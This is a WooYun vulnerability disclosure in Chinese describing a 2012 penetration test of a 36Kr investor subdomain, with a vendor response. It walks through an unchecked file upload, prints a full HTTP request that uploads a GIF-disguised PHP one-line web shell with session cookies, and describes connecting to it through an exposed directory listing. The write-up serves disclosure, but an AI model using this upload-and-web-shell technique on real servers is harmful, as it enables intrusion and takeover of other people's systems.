当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06775

漏洞标题:对36氪的一次渗透测试

相关厂商:36氪科技博客

漏洞作者: Jannock

提交时间:2012-05-07 20:56

修复时间:2012-06-21 20:57

公开时间:2012-06-21 20:57

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-07: 细节已通知厂商并且等待厂商处理中
2012-05-07: 厂商已经确认,细节仅向厂商公开
2012-05-17: 细节向核心白帽子及相关领域专家公开
2012-05-27: 细节向普通白帽子公开
2012-06-06: 细节向实习白帽子公开
2012-06-21: 细节向公众公开

简要描述:

对36氪的一次渗透测试

详细说明:

今天无意看到wooyun(http://weibo.com/wooyun2)微博中转发了36氪的某微博,然后手戝点了一下,看到36氪的主页(http://www.36kr.com/),WordPress程序,没搞头呀(手上有oady的可以wooyun一下),于是试试渗透吧。于是看到投资人服务那里有个分站链接:http://vc.36tr.com/ 注册个创业者身份看看有些什么内容吧。创业者可以上传头像,创建产品什么的。
习惯性动作,上传头像抓包改包上传。但经过数次测试,发现上传非图片文件,名称后辍自动加上“_”,即上传 .php 去变成了 ._php 这样的文件不被解释呀。。。但这个过程中也会暴出图片处理的错误信息如下:
#0 [2 : getimagesize(/var/www/36tree_v2.0/mars/host/http://vc.36tr.com:80/avatar_image/20120507/11/34/90/n1336371610158.gif): failed to open stream: No such file or directory] tracking call at ()
#1 getimagesize call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (212)
#2 getWidth call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (246)
#3 executeAvatar call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (62)
#4 tempSaveUploadPicture call at /var/www/36tree_v2.0/mars/app/vccontroller/signup.class.php (170)
#5 do_ajax_getHtmlSetAvatar call at /var/www/36tree_v2.0/corelib/CAction.class.php (127)
#6 do_method call at /var/www/36tree_v2.0/mars/vchost/index.php (68)
这暴路径没什么意义呢,继续看创建产品的。


一眼看到还有上传的地方,心里暗喜。^-^
于是随便填了些信息上传抓包,并把文件名改成了php后辍,重新提交。
POST /product/ajax_importBussinessFile HTTP/1.1
Host: vc.36tr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://vc.36tr.com/product/new/step3/1429
Cookie: PHPSESSID=uc7qlr9k1toucpjl3ocldsida3; __utma=115084165.360224318.1336370862.1336370862.1336371307.2; __utmb=115084165.43.10.1336371307; __utmc=115084165; __utmz=115084165.1336371307.2.2.utmcsr=bing|utmccn=(organic)|utmcmd=organic|utmctr=ip%3A220.181.49.209; vc_session_dd=4bc060e1ccfa40c8; vc_user_cookie=56a4496decebcd8961228599a63b0708
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 391
-----------------------------24464570528145
Content-Disposition: form-data; name="product_id"
1429
-----------------------------24464570528145
Content-Disposition: form-data; name="bussiness_file[]"; filename="aa.php"
Content-Type: application/vnd.ms-powerpoint
GIF89a.............!.......,............
<?php eval($_POST[guji]); ?>
-----------------------------24464570528145—


上传成功了,没错。没有检测文件后辍。正高兴着,访问之,即时杯具了。。


文件直接下载了????
当时在想,这是php设置了解释问题?文件是存在数据库中?文件是通过读取输出来的?
心想,无论上述是那一种,都没什么办法。唉,放弃吧!!!
但又手戝了一下,输入:http://img.36tr.com/pdf/


操,有机,看来今天RP暴发,服务器不但列目录,而且文件放在上面了。呵呵。。。后面的不用说了,用一句话客户端连上去,服务器权限大着呢。很多网站都在这里,还有些重要的信息。主站好像不在这服务器上,我就不继续了。木马文件我也删除了。
但是经过对信息挖掘和分析,发现利用“社会工程”,各个地方的管理使用同一个账号密码可能导致其他网站甚至包括主站也是可以进入的

漏洞证明:



修复方案:

注意分站安全。其它应该懂得。

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-05-07 23:38

厂商回复:

谢谢作者给我们提供的宝贵信息,我们将会努力解决这些安全隐患,为创业者提供更好更优质的服务.
再次感谢作者不遗余力的为我们做测试,也非常期望能向作者取得有效的联系,在后续的过程中,不断请教作者.
太谢谢了.
吴敏 (http://weibo.com/yunzhongzi)

最新状态:

2012-05-07:http://weibo.com/yunzhongzi 是我的微博,希望能和你进行有效的沟通,同时希望作者能够给出更加宝贵的建议和意见.